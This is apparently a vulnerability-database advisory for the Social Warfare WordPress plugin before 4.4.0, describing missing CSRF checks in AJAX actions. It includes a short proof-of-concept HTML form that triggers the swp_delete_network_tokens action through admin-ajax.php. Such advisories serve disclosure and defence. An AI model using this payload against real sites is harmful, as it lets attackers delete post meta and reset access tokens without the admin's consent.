Lucene search

K
wpexploitWpvulndbWPEX-ID:7140ABF5-5966-4361-BD51-EE29D3071A30
HistoryJan 05, 2023 - 12:00 a.m.

Social Warfare < 4.4.0 - Post Meta Deletion via CSRF

2023-01-0500:00:00
wpvulndb
73
social warfare
post meta deletion
csrf
admin-ajax.php

0.001 Low

EPSS

Percentile

45.7%

The plugin does not have CSRF checks in some AJAX actions, allowing attackers, to make a logged in admin call them and delete arbitrary post meta as well as reset access tokens related to network via CSRF attacks

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="swp_delete_network_tokens">
    <input type="text" name="network" value="42">
    <input type="submit" name="submit" value="submit">
</form>

0.001 Low

EPSS

Percentile

45.7%

Related for WPEX-ID:7140ABF5-5966-4361-BD51-EE29D3071A30